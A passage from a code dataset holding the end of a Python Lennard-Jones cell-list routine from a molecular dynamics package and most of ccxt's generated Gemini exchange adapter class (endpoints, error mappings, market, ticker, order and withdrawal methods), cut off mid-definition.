[-1, 1, 1], [ 0, 1, 1], [ 1, 1, 1] ] )\n\n r = r - np.rint(r) # Ensure all atoms in periodic box\n\n r_cut_box = r_cut / box\n r_cut_box_sq = r_cut_box ** 2\n box_sq = box ** 2\n\n hes = 0.0\n\n # Calculate cell index triplets\n sc = math.floor(box/r_cut) # Number of cells along box edge\n c = np.floor((r+0.5)*sc).astype(np.int_) # N*3 array of cell indices for all atoms\n assert np.all(c>=0) and np.all(c<sc), 'Index error' # Simplistic \"guard\" against roundoff\n\n if fast:\n \n # Build list of arrays, each array holding positions of atoms in a cell\n # At the same time, build a matching set of force arrays in each cell\n # i and j number the atoms in each cell; we do not refer explicitly to indices in r\n rc, fc = [], [] # Initially empty lists of positions and forces\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n rc.append(r[mask,:]) # Copy atom coordinates into array, add to list\n fc.append(f[mask,:]) # Copy corresponding forces, add to list\n \n for ci1, rci in enumerate(rc): # Loop over i-cells, getting all atoms in each i-cell as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n fci = fc[ci1] # Get i-cell atom forces\n if rci.size==0: # Handle empty cell\n continue\n\n for dj in d: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert j-cell to single-index\n rcj = rc[cj1] # Get atoms in j-cell as an array\n fcj = fc[cj1] # Get j-cell atom forces\n if rcj.size==0: # Handle empty cell\n continue\n\n rij = rci[:,np.newaxis,:]-rcj[np.newaxis,:,:] # Separation vectors for all i and j\n rij = rij - np.rint(rij) # PBCs in box=1 units\n rij_sq = np.sum(rij**2,axis=2) # Squared separations\n in_range = rij_sq < r_cut_box_sq # Set flags for within cutoff\n\n if ci1==cj1:\n np.fill_diagonal(in_range,False) # Eliminate i=j when i-cell is j-cell\n np.fill_diagonal(rij_sq,1.0) # Avoid divide-by-zero below\n\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n fij = fci[:,np.newaxis,:]-fcj[np.newaxis,:,:] # Differences in forces for all i and j\n\n ff = np.sum(fij*fij,axis=2)\n rf = np.sum(rij*fij,axis=2)\n sr2 = np.where ( in_range, 1.0 / rij_sq, 0.0 ) # Only where in range\n sr6 = sr2 ** 3\n sr8 = sr6 * sr2\n sr10 = sr8 * sr2\n v1 = 24.0 * ( 1.0 - 2.0 * sr6 ) * sr8\n v2 = 96.0 * ( 7.0 * sr6 - 2.0 ) * sr10\n if ci1==cj1: # Correct for double-counting ij and ji\n hes = hes + np.sum(v1 * ff)/2 + np.sum(v2 * rf**2)/2\n else:\n hes = hes + np.sum(v1 * ff) + np.sum(v2 * rf**2)\n\n else:\n \n # Build list of arrays, each array holding indices of atoms in a cell\n # ki and kj are atom indices in the r array; i and j number the atoms in each cell\n k_array = np.arange(n) # Atom indices 0..N-1\n kc = [] # Initially empty list of indices covering each cell\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n kc.append(k_array[mask]) # Copy atom indices into array, add to list\n\n for ci1, kci in enumerate(kc): # Loop over i-cells, getting atom indices as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n\n for dj in d: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert to single-index\n kcj = kc[cj1] # Get indices of atoms in j-cell as an array\n\n for i, ki in enumerate(kci): # Loop over individual atoms in i-cell\n j0 = i+1 if cj1==ci1 else 0 # Only look upwards if i-cell==j-cell\n if j0 >= kcj.size: # Handles (redundantly) empty j-cell and the case \n continue # where j-cell==i-cell and i is last atom\n\n for kj in kcj[j0:]: # Loop over individual atoms in j-cell\n rij = r[ki,:]-r[kj,:] # Separation vector\n rij = rij - np.rint(rij) # Periodic boundary conditions in box=1 units\n rij_sq = np.sum(rij**2) # Squared separation\n\n if rij_sq < r_cut_box_sq:\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n fij = f[ki,:] - f[kj,:] # Difference in forces\n \n ff = np.dot(fij,fij)\n rf = np.dot(rij,fij)\n sr2 = 1.0 / rij_sq\n sr6 = sr2 ** 3\n sr8 = sr6 * sr2\n sr10 = sr8 * sr2\n v1 = 24.0 * ( 1.0 - 2.0 * sr6 ) * sr8\n v2 = 96.0 * ( 7.0 * sr6 - 2.0 ) * sr10\n hes = hes + v1 * ff + v2 * rf**2\n\n return hes\n"} {"ext": "py", "sha": "1a30de7e64cb793b53cfa5d7f193eb6e863803db", "content": "# -*- coding: utf-8 -*-\n\n# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:\n# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code\n\nfrom ccxt.base.exchange import Exchange\n\n# -----------------------------------------------------------------------------\n\ntry:\n basestring # Python 3\nexcept NameError:\n basestring = str # Python 2\nimport hashlib\nfrom ccxt.base.errors import ExchangeError\nfrom ccxt.base.errors import AuthenticationError\nfrom ccxt.base.errors import PermissionDenied\nfrom ccxt.base.errors import ArgumentsRequired\nfrom ccxt.base.errors import BadRequest\nfrom ccxt.base.errors import InsufficientFunds\nfrom ccxt.base.errors import InvalidOrder\nfrom ccxt.base.errors import OrderNotFound\nfrom ccxt.base.errors import NotSupported\nfrom ccxt.base.errors import RateLimitExceeded\nfrom ccxt.base.errors import ExchangeNotAvailable\nfrom ccxt.base.errors import OnMaintenance\nfrom ccxt.base.errors import InvalidNonce\nfrom ccxt.base.decimal_to_precision import TICK_SIZE\n\n\nclass gemini(Exchange):\n\n def describe(self):\n return self.deep_extend(super(gemini, self).describe(), {\n 'id': 'gemini',\n 'name': 'Gemini',\n 'countries': ['US'],\n # 600 requests a minute = 10 requests per second => 1000ms / 10 = 100ms between requests(private endpoints)\n # 120 requests a minute = 2 requests per second =>( 1000ms / rateLimit ) / 2 = 5(public endpoints)\n 'rateLimit': 100,\n 'version': 'v1',\n 'has': {\n 'CORS': None,\n 'spot': True,\n 'margin': False,\n 'swap': False,\n 'future': False,\n 'option': False,\n 'addMargin': False,\n 'cancelOrder': True,\n 'createDepositAddress': True,\n 'createMarketOrder': None,\n 'createOrder': True,\n 'createReduceOnlyOrder': False,\n 'fetchBalance': True,\n 'fetchBidsAsks': None,\n 'fetchBorrowRate': False,\n 'fetchBorrowRateHistories': False,\n 'fetchBorrowRateHistory': False,\n 'fetchBorrowRates': False,\n 'fetchBorrowRatesPerSymbol': False,\n 'fetchClosedOrders': None,\n 'fetchDepositAddress': None, # TODO\n 'fetchDepositAddressesByNetwork': True,\n 'fetchDeposits': None,\n 'fetchFundingHistory': False,\n 'fetchFundingRate': False,\n 'fetchFundingRateHistory': False,\n 'fetchFundingRates': False,\n 'fetchIndexOHLCV': False,\n 'fetchIsolatedPositions': False,\n 'fetchLeverage': False,\n 'fetchLeverageTiers': False,\n 'fetchMarkets': True,\n 'fetchMarkOHLCV': False,\n 'fetchMyTrades': True,\n 'fetchOHLCV': True,\n 'fetchOpenOrders': True,\n 'fetchOrder': True,\n 'fetchOrderBook': True,\n 'fetchOrders': None,\n 'fetchPosition': False,\n 'fetchPositions': False,\n 'fetchPositionsRisk': False,\n 'fetchPremiumIndexOHLCV': False,\n 'fetchTicker': True,\n 'fetchTickers': True,\n 'fetchTrades': True,\n 'fetchTransactions': True,\n 'fetchWithdrawals': None,\n 'reduceMargin': False,\n 'setLeverage': False,\n 'setMarginMode': False,\n 'setPositionMode': False,\n 'withdraw': True,\n },\n 'urls': {\n 'logo': 'https://user-images.githubusercontent.com/1294454/27816857-ce7be644-6096-11e7-82d6-3c257263229c.jpg',\n 'api': {\n 'public': 'https://api.gemini.com',\n 'private': 'https://api.gemini.com',\n 'web': 'https://docs.gemini.com',\n },\n 'www': 'https://gemini.com/',\n 'doc': [\n 'https://docs.gemini.com/rest-api',\n 'https://docs.sandbox.gemini.com',\n ],\n 'test': {\n 'public': 'https://api.sandbox.gemini.com',\n 'private': 'https://api.sandbox.gemini.com',\n # use the True doc instead of the sandbox doc\n # since they differ in parsing\n # https://github.com/ccxt/ccxt/issues/7874\n # https://github.com/ccxt/ccxt/issues/7894\n 'web': 'https://docs.gemini.com',\n },\n 'fees': [\n 'https://gemini.com/api-fee-schedule',\n 'https://gemini.com/trading-fees',\n 'https://gemini.com/transfer-fees',\n ],\n },\n 'api': {\n 'web': {\n 'get': [\n 'rest-api',\n ],\n },\n 'public': {\n 'get': {\n 'v1/symbols': 5,\n 'v1/symbols/details/{symbol}': 5,\n 'v1/pubticker/{symbol}': 5,\n 'v2/ticker/{symbol}': 5,\n 'v2/candles/{symbol}/{timeframe}': 5,\n 'v1/trades/{symbol}': 5,\n 'v1/auction/{symbol}': 5,\n 'v1/auction/{symbol}/history': 5,\n 'v1/pricefeed': 5,\n 'v1/book/{symbol}': 5,\n 'v1/earn/rates': 5,\n },\n },\n 'private': {\n 'post': {\n 'v1/order/new': 1,\n 'v1/order/cancel': 1,\n 'v1/wrap/{symbol}': 1,\n 'v1/order/cancel/session': 1,\n 'v1/order/cancel/all': 1,\n 'v1/order/status': 1,\n 'v1/orders': 1,\n 'v1/mytrades': 1,\n 'v1/notionalvolume': 1,\n 'v1/tradevolume': 1,\n 'v1/clearing/new': 1,\n 'v1/clearing/status': 1,\n 'v1/clearing/cancel': 1,\n 'v1/clearing/confirm': 1,\n 'v1/balances': 1,\n 'v1/notionalbalances/{currency}': 1,\n 'v1/transfers': 1,\n 'v1/addresses/{network}': 1,\n 'v1/deposit/{network}/newAddress': 1,\n 'v1/deposit/{currency}/newAddress': 1,\n 'v1/withdraw/{currency}': 1,\n 'v1/account/transfer/{currency}': 1,\n 'v1/payments/addbank': 1,\n 'v1/payments/methods': 1,\n 'v1/payments/sen/withdraw': 1,\n 'v1/balances/earn': 1,\n 'v1/earn/interest': 1,\n 'v1/approvedAddresses/{network}/request': 1,\n 'v1/approvedAddresses/account/{network}': 1,\n 'v1/approvedAddresses/{network}/remove': 1,\n 'v1/account': 1,\n 'v1/account/create': 1,\n 'v1/account/list': 1,\n 'v1/heartbeat': 1,\n },\n },\n },\n 'precisionMode': TICK_SIZE,\n 'fees': {\n 'trading': {\n 'taker': 0.0035,\n 'maker': 0.001,\n },\n },\n 'httpExceptions': {\n '400': BadRequest, # Auction not open or paused, ineligible timing, market not open, or the request was malformed, in the case of a private API request, missing or malformed Gemini private API authentication headers\n '403': PermissionDenied, # The API key is missing the role necessary to access self private API endpoint\n '404': OrderNotFound, # Unknown API entry point or Order not found\n '406': InsufficientFunds, # Insufficient Funds\n '429': RateLimitExceeded, # Rate Limiting was applied\n '500': ExchangeError, # The server encountered an error\n '502': ExchangeNotAvailable, # Technical issues are preventing the request from being satisfied\n '503': OnMaintenance, # The exchange is down for maintenance\n },\n 'timeframes': {\n '1m': '1m',\n '5m': '5m',\n '15m': '15m',\n '30m': '30m',\n '1h': '1hr',\n '6h': '6hr',\n '1d': '1day',\n },\n 'exceptions': {\n 'exact': {\n 'AuctionNotOpen': BadRequest, # Failed to place an auction-only order because there is no current auction open for self symbol\n 'ClientOrderIdTooLong': BadRequest, # The Client Order ID must be under 100 characters\n 'ClientOrderIdMustBeString': BadRequest, # The Client Order ID must be a string\n 'ConflictingOptions': BadRequest, # New orders using a combination of order execution options are not supported\n 'EndpointMismatch': BadRequest, # The request was submitted to an endpoint different than the one in the payload\n 'EndpointNotFound': BadRequest, # No endpoint was specified\n 'IneligibleTiming': BadRequest, # Failed to place an auction order for the current auction on self symbol because the timing is not eligible, new orders may only be placed before the auction begins.\n 'InsufficientFunds': InsufficientFunds, # The order was rejected because of insufficient funds\n 'InvalidJson': BadRequest, # The JSON provided is invalid\n 'InvalidNonce': InvalidNonce, # The nonce was not greater than the previously used nonce, or was not present\n 'InvalidOrderType': InvalidOrder, # An unknown order type was provided\n 'InvalidPrice': InvalidOrder, # For new orders, the price was invalid\n 'InvalidQuantity': InvalidOrder, # A negative or otherwise invalid quantity was specified\n 'InvalidSide': InvalidOrder, # For new orders, and invalid side was specified\n 'InvalidSignature': AuthenticationError, # The signature did not match the expected signature\n 'InvalidSymbol': BadRequest, # An invalid symbol was specified\n 'InvalidTimestampInPayload': BadRequest, # The JSON payload contained a timestamp parameter with an unsupported value.\n 'Maintenance': OnMaintenance, # The system is down for maintenance\n 'MarketNotOpen': InvalidOrder, # The order was rejected because the market is not accepting new orders\n 'MissingApikeyHeader': AuthenticationError, # The X-GEMINI-APIKEY header was missing\n 'MissingOrderField': InvalidOrder, # A required order_id field was not specified\n 'MissingRole': AuthenticationError, # The API key used to access self endpoint does not have the required role assigned to it\n 'MissingPayloadHeader': AuthenticationError, # The X-GEMINI-PAYLOAD header was missing\n 'MissingSignatureHeader': AuthenticationError, # The X-GEMINI-SIGNATURE header was missing\n 'NoSSL': AuthenticationError, # You must use HTTPS to access the API\n 'OptionsMustBeArray': BadRequest, # The options parameter must be an array.\n 'OrderNotFound': OrderNotFound, # The order specified was not found\n 'RateLimit': RateLimitExceeded, # Requests were made too frequently. See Rate Limits below.\n 'System': ExchangeError, # We are experiencing technical issues\n 'UnsupportedOption': BadRequest, # This order execution option is not supported.\n },\n 'broad': {\n 'The Gemini Exchange is currently undergoing maintenance.': OnMaintenance, # The Gemini Exchange is currently undergoing maintenance. Please check https://status.gemini.com/ for more information.\n 'We are investigating technical issues with the Gemini Exchange.': ExchangeNotAvailable, # We are investigating technical issues with the Gemini Exchange. Please check https://status.gemini.com/ for more information.\n },\n },\n 'options': {\n 'fetchMarketsMethod': 'fetch_markets_from_web',\n 'fetchTickerMethod': 'fetchTickerV1', # fetchTickerV1, fetchTickerV2, fetchTickerV1AndV2\n 'networkIds': {\n 'bitcoin': 'BTC',\n 'ethereum': 'ERC20',\n 'bitcoincash': 'BCH',\n 'litecoin': 'LTC',\n 'zcash': 'ZEC',\n 'filecoin': 'FIL',\n 'dogecoin': 'DOGE',\n 'tezos': 'XTZ',\n },\n 'networks': {\n 'BTC': 'bitcoin',\n 'ERC20': 'ethereum',\n 'BCH': 'bitcoincash',\n 'LTC': 'litecoin',\n 'ZEC': 'zcash',\n 'FIL': 'filecoin',\n 'DOGE': 'dogecoin',\n 'XTZ': 'tezos',\n },\n },\n })\n\n def fetch_markets(self, params={}):\n method = self.safe_value(self.options, 'fetchMarketsMethod', 'fetch_markets_from_api')\n return getattr(self, method)(params)\n\n def fetch_markets_from_web(self, params={}):\n response = self.webGetRestApi(params)\n sections = response.split('<h1 id=\"symbols-and-minimums\">Symbols and minimums</h1>')\n numSections = len(sections)\n error = self.id + ' the ' + self.name + ' API doc HTML markup has changed, breaking the parser of order limits and precision info for ' + self.name + ' markets.'\n if numSections != 2:\n raise NotSupported(error)\n tables = sections[1].split('tbody>')\n numTables = len(tables)\n if numTables < 2:\n raise NotSupported(error)\n rows = tables[1].split(\"\\n<tr>\\n\") # eslint-disable-line quotes\n numRows = len(rows)\n if numRows < 2:\n raise NotSupported(error)\n result = []\n # skip the first element(empty string)\n for i in range(1, numRows):\n row = rows[i]\n cells = row.split(\"</td>\\n\") # eslint-disable-line quotes\n numCells = len(cells)\n if numCells < 5:\n raise NotSupported(error)\n # [\n # '<td>btcusd', # currency\n # '<td>0.00001 BTC(1e-5)', # min order size\n # '<td>0.00000001 BTC(1e-8)', # tick size\n # '<td>0.01 USD', # quote currency price increment\n # '</tr>'\n # ]\n marketId = cells[0].replace('<td>', '')\n # base = self.safe_currency_code(baseId)\n minAmountString = cells[1].replace('<td>', '')\n minAmountParts = minAmountString.split(' ')\n minAmount = self.safe_number(minAmountParts, 0)\n amountPrecisionString = cells[2].replace('<td>', '')\n amountPrecisionParts = amountPrecisionString.split(' ')\n idLength = len(marketId) - 0\n startingIndex = idLength - 3\n quoteId = marketId[startingIndex:idLength]\n quote = self.safe_currency_code(quoteId)\n pricePrecisionString = cells[3].replace('<td>', '')\n pricePrecisionParts = pricePrecisionString.split(' ')\n baseId = marketId.replace(quoteId, '')\n base = self.safe_currency_code(baseId)\n result.append({\n 'id': marketId,\n 'symbol': base + '/' + quote,\n 'base': base,\n 'quote': quote,\n 'settle': None,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'settleId': None,\n 'type': 'spot',\n 'spot': True,\n 'margin': False,\n 'swap': False,\n 'future': False,\n 'option': False,\n 'active': None,\n 'contract': False,\n 'linear': None,\n 'inverse': None,\n 'contractSize': None,\n 'expiry': None,\n 'expiryDatetime': None,\n 'strike': None,\n 'optionType': None,\n 'precision': {\n 'amount': self.safe_number(amountPrecisionParts, 0),\n 'price': self.safe_number(pricePrecisionParts, 0),\n },\n 'limits': {\n 'leverage': {\n 'min': None,\n 'max': None,\n },\n 'amount': {\n 'min': minAmount,\n 'max': None,\n },\n 'price': {\n 'min': None,\n 'max': None,\n },\n 'cost': {\n 'min': None,\n 'max': None,\n },\n },\n 'info': row,\n })\n return result\n\n def fetch_markets_from_api(self, params={}):\n response = self.publicGetV1Symbols(params)\n result = []\n for i in range(0, len(response)):\n marketId = response[i]\n market = marketId\n idLength = len(marketId) - 0\n baseId = marketId[0:idLength - 3]\n quoteId = marketId[idLength - 3:idLength]\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n result.append({\n 'id': marketId,\n 'symbol': base + '/' + quote,\n 'base': base,\n 'quote': quote,\n 'settle': None,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'settleId': None,\n 'type': 'spot',\n 'spot': True,\n 'margin': False,\n 'swap': False,\n 'future': False,\n 'option': False,\n 'active': None,\n 'contract': False,\n 'linear': None,\n 'inverse': None,\n 'contractSize': None,\n 'expiry': None,\n 'expiryDatetime': None,\n 'strike': None,\n 'optionType': None,\n 'precision': {\n 'price': None,\n 'amount': None,\n },\n 'limits': {\n 'leverage': {\n 'min': None,\n 'max': None,\n },\n 'amount': {\n 'min': None,\n 'max': None,\n },\n 'price': {\n 'min': None,\n 'max': None,\n },\n 'cost': {\n 'min': None,\n 'max': None,\n },\n },\n 'info': market,\n })\n return result\n\n def fetch_order_book(self, symbol, limit=None, params={}):\n self.load_markets()\n request = {\n 'symbol': self.market_id(symbol),\n }\n if limit is not None:\n request['limit_bids'] = limit\n request['limit_asks'] = limit\n response = self.publicGetV1BookSymbol(self.extend(request, params))\n return self.parse_order_book(response, symbol, None, 'bids', 'asks', 'price', 'amount')\n\n def fetch_ticker_v1(self, symbol, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'symbol': market['id'],\n }\n response = self.publicGetV1PubtickerSymbol(self.extend(request, params))\n #\n # {\n # \"bid\":\"9117.95\",\n # \"ask\":\"9117.96\",\n # \"volume\":{\n # \"BTC\":\"1615.46861748\",\n # \"USD\":\"14727307.57545006088\",\n # \"timestamp\":1594982700000\n # },\n # \"last\":\"9115.23\"\n # }\n #\n return self.parse_ticker(response, market)\n\n def fetch_ticker_v2(self, symbol, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'symbol': market['id'],\n }\n response = self.publicGetV2TickerSymbol(self.extend(request, params))\n #\n # {\n # \"symbol\":\"BTCUSD\",\n # \"open\":\"9080.58\",\n # \"high\":\"9184.53\",\n # \"low\":\"9063.56\",\n # \"close\":\"9116.08\",\n # # Hourly prices descending for past 24 hours\n # \"changes\":[\"9117.33\",\"9105.69\",\"9106.23\",\"9120.35\",\"9098.57\",\"9114.53\",\"9113.55\",\"9128.01\",\"9113.63\",\"9133.49\",\"9133.49\",\"9137.75\",\"9126.73\",\"9103.91\",\"9119.33\",\"9123.04\",\"9124.44\",\"9117.57\",\"9114.22\",\"9102.33\",\"9076.67\",\"9074.72\",\"9074.97\",\"9092.05\"],\n # \"bid\":\"9115.86\",\n # \"ask\":\"9115.87\"\n # }\n #\n return self.parse_ticker(response, market)\n\n def fetch_ticker_v1_and_v2(self, symbol, params={}):\n tickerA = self.fetch_ticker_v1(symbol, params)\n tickerB = self.fetch_ticker_v2(symbol, params)\n return self.deep_extend(tickerA, {\n 'open': tickerB['open'],\n 'high': tickerB['high'],\n 'low': tickerB['low'],\n 'change': tickerB['change'],\n 'percentage': tickerB['percentage'],\n 'average': tickerB['average'],\n 'info': tickerB['info'],\n })\n\n def fetch_ticker(self, symbol, params={}):\n method = self.safe_value(self.options, 'fetchTickerMethod', 'fetchTickerV1')\n return getattr(self, method)(symbol, params)\n\n def parse_ticker(self, ticker, market=None):\n #\n # fetchTickers\n #\n # {\n # \"pair\": \"BATUSD\",\n # \"price\": \"0.20687\",\n # \"percentChange24h\": \"0.0146\"\n # }\n #\n # fetchTickerV1\n #\n # {\n # \"bid\":\"9117.95\",\n # \"ask\":\"9117.96\",\n # \"volume\":{\n # \"BTC\":\"1615.46861748\",\n # \"USD\":\"14727307.57545006088\",\n # \"timestamp\":1594982700000\n # },\n # \"last\":\"9115.23\"\n # }\n #\n # fetchTickerV2\n #\n # {\n # \"symbol\":\"BTCUSD\",\n # \"open\":\"9080.58\",\n # \"high\":\"9184.53\",\n # \"low\":\"9063.56\",\n # \"close\":\"9116.08\",\n # # Hourly prices descending for past 24 hours\n # \"changes\":[\"9117.33\",\"9105.69\",\"9106.23\",\"9120.35\",\"9098.57\",\"9114.53\",\"9113.55\",\"9128.01\",\"9113.63\",\"9133.49\",\"9133.49\",\"9137.75\",\"9126.73\",\"9103.91\",\"9119.33\",\"9123.04\",\"9124.44\",\"9117.57\",\"9114.22\",\"9102.33\",\"9076.67\",\"9074.72\",\"9074.97\",\"9092.05\"],\n # \"bid\":\"9115.86\",\n # \"ask\":\"9115.87\"\n # }\n #\n volume = self.safe_value(ticker, 'volume', {})\n timestamp = self.safe_integer(volume, 'timestamp')\n symbol = None\n marketId = self.safe_string_lower(ticker, 'pair')\n baseId = None\n quoteId = None\n base = None\n quote = None\n if marketId is not None:\n if marketId in self.markets_by_id:\n market = self.markets_by_id[marketId]\n else:\n idLength = len(marketId) - 0\n if idLength == 7:\n baseId = marketId[0:4]\n quoteId = marketId[4:7]\n else:\n baseId = marketId[0:3]\n quoteId = marketId[3:6]\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = base + '/' + quote\n if (symbol is None) and (market is not None):\n symbol = market['symbol']\n baseId = market['baseId'].upper()\n quoteId = market['quoteId'].upper()\n base = market['base']\n quote = market['quote']\n price = self.safe_string(ticker, 'price')\n last = self.safe_string_2(ticker, 'last', 'close', price)\n percentage = self.safe_string(ticker, 'percentChange24h')\n open = self.safe_string(ticker, 'open')\n baseVolume = self.safe_string(volume, baseId)\n quoteVolume = self.safe_string(volume, quoteId)\n return self.safe_ticker({\n 'symbol': symbol,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'high': self.safe_string(ticker, 'high'),\n 'low': self.safe_string(ticker, 'low'),\n 'bid': self.safe_string(ticker, 'bid'),\n 'bidVolume': None,\n 'ask': self.safe_string(ticker, 'ask'),\n 'askVolume': None,\n 'vwap': None,\n 'open': open,\n 'close': last,\n 'last': last,\n 'previousClose': None, # previous day close\n 'change': None,\n 'percentage': percentage,\n 'average': None,\n 'baseVolume': baseVolume,\n 'quoteVolume': quoteVolume,\n 'info': ticker,\n }, market, False)\n\n def fetch_tickers(self, symbols=None, params={}):\n self.load_markets()\n response = self.publicGetV1Pricefeed(params)\n #\n # [\n # {\n # \"pair\": \"BATUSD\",\n # \"price\": \"0.20687\",\n # \"percentChange24h\": \"0.0146\"\n # },\n # {\n # \"pair\": \"LINKETH\",\n # \"price\": \"0.018\",\n # \"percentChange24h\": \"0.0000\"\n # },\n # ]\n #\n return self.parse_tickers(response, symbols)\n\n def parse_trade(self, trade, market=None):\n #\n # public fetchTrades\n #\n # {\n # \"timestamp\":1601617445,\n # \"timestampms\":1601617445144,\n # \"tid\":14122489752,\n # \"price\":\"0.46476\",\n # \"amount\":\"28.407209\",\n # \"exchange\":\"gemini\",\n # \"type\":\"buy\"\n # }\n #\n # private fetchTrades\n #\n # {\n # \"price\":\"3900.00\",\n # \"amount\":\"0.00996\",\n # \"timestamp\":1638891173,\n # \"timestampms\":1638891173518,\n # \"type\":\"Sell\",\n # \"aggressor\":false,\n # \"fee_currency\":\"EUR\",\n # \"fee_amount\":\"0.00\",\n # \"tid\":73621746145,\n # \"order_id\":\"73621746059\",\n # \"exchange\":\"gemini\",\n # \"is_auction_fill\":false,\n # \"is_clearing_fill\":false,\n # \"symbol\":\"ETHEUR\",\n # \"client_order_id\":\"1638891171610\"\n # }\n #\n timestamp = self.safe_integer(trade, 'timestampms')\n id = self.safe_string(trade, 'tid')\n orderId = self.safe_string(trade, 'order_id')\n feeCurrencyId = self.safe_string(trade, 'fee_currency')\n feeCurrencyCode = self.safe_currency_code(feeCurrencyId)\n fee = {\n 'cost': self.safe_string(trade, 'fee_amount'),\n 'currency': feeCurrencyCode,\n }\n priceString = self.safe_string(trade, 'price')\n amountString = self.safe_string(trade, 'amount')\n side = self.safe_string_lower(trade, 'type')\n symbol = self.safe_symbol(None, market)\n return self.safe_trade({\n 'id': id,\n 'order': orderId,\n 'info': trade,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'symbol': symbol,\n 'type': None,\n 'side': side,\n 'takerOrMaker': None,\n 'price': priceString,\n 'cost': None,\n 'amount': amountString,\n 'fee': fee,\n }, market)\n\n def fetch_trades(self, symbol, since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'symbol': market['id'],\n }\n response = self.publicGetV1TradesSymbol(self.extend(request, params))\n #\n # [\n # {\n # \"timestamp\":1601617445,\n # \"timestampms\":1601617445144,\n # \"tid\":14122489752,\n # \"price\":\"0.46476\",\n # \"amount\":\"28.407209\",\n # \"exchange\":\"gemini\",\n # \"type\":\"buy\"\n # },\n # ]\n #\n return self.parse_trades(response, market, since, limit)\n\n def parse_balance(self, response):\n result = {'info': response}\n for i in range(0, len(response)):\n balance = response[i]\n currencyId = self.safe_string(balance, 'currency')\n code = self.safe_currency_code(currencyId)\n account = self.account()\n account['free'] = self.safe_string(balance, 'available')\n account['total'] = self.safe_string(balance, 'amount')\n result[code] = account\n return self.safe_balance(result)\n\n def fetch_balance(self, params={}):\n self.load_markets()\n response = self.privatePostV1Balances(params)\n return self.parse_balance(response)\n\n def parse_order(self, order, market=None):\n timestamp = self.safe_integer(order, 'timestampms')\n amount = self.safe_string(order, 'original_amount')\n remaining = self.safe_string(order, 'remaining_amount')\n filled = self.safe_string(order, 'executed_amount')\n status = 'closed'\n if order['is_live']:\n status = 'open'\n if order['is_cancelled']:\n status = 'canceled'\n price = self.safe_string(order, 'price')\n average = self.safe_string(order, 'avg_execution_price')\n type = self.safe_string(order, 'type')\n if type == 'exchange limit':\n type = 'limit'\n elif type == 'market buy' or type == 'market sell':\n type = 'market'\n else:\n type = order['type']\n fee = None\n marketId = self.safe_string(order, 'symbol')\n symbol = self.safe_symbol(marketId, market)\n id = self.safe_string(order, 'order_id')\n side = self.safe_string_lower(order, 'side')\n clientOrderId = self.safe_string(order, 'client_order_id')\n return self.safe_order({\n 'id': id,\n 'clientOrderId': clientOrderId,\n 'info': order,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'lastTradeTimestamp': None,\n 'status': status,\n 'symbol': symbol,\n 'type': type,\n 'timeInForce': None,\n 'postOnly': None,\n 'side': side,\n 'price': price,\n 'stopPrice': None,\n 'average': average,\n 'cost': None,\n 'amount': amount,\n 'filled': filled,\n 'remaining': remaining,\n 'fee': fee,\n 'trades': None,\n }, market)\n\n def fetch_order(self, id, symbol=None, params={}):\n self.load_markets()\n request = {\n 'order_id': id,\n }\n response = self.privatePostV1OrderStatus(self.extend(request, params))\n return self.parse_order(response)\n\n def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):\n self.load_markets()\n response = self.privatePostV1Orders(params)\n market = None\n if symbol is not None:\n market = self.market(symbol) # throws on non-existent symbol\n return self.parse_orders(response, market, since, limit)\n\n def create_order(self, symbol, type, side, amount, price=None, params={}):\n self.load_markets()\n if type == 'market':\n raise ExchangeError(self.id + ' allows limit orders only')\n nonce = self.nonce()\n amountString = self.amount_to_precision(symbol, amount)\n priceString = self.price_to_precision(symbol, price)\n request = {\n 'client_order_id': str(nonce),\n 'symbol': self.market_id(symbol),\n 'amount': amountString,\n 'price': priceString,\n 'side': side,\n 'type': 'exchange limit', # gemini allows limit orders only\n }\n response = self.privatePostV1OrderNew(self.extend(request, params))\n return {\n 'info': response,\n 'id': response['order_id'],\n }\n\n def cancel_order(self, id, symbol=None, params={}):\n self.load_markets()\n request = {\n 'order_id': id,\n }\n return self.privatePostV1OrderCancel(self.extend(request, params))\n\n def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'symbol': market['id'],\n }\n if limit is not None:\n request['limit_trades'] = limit\n if since is not None:\n request['timestamp'] = int(since / 1000)\n response = self.privatePostV1Mytrades(self.extend(request, params))\n return self.parse_trades(response, market, since, limit)\n\n def withdraw(self, code, amount, address, tag=None, params={}):\n tag, params = self.handle_withdraw_tag_and_params(tag, params)\n self.check_address(address)\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n 'amount': amount,\n 'address': address,\n }\n response = self.privatePostV1WithdrawCurrency(self.extend(request, params))\n return {\n 'info': response,\n 'id': self.safe_string(response, 'txHash'),\n }\n\n def 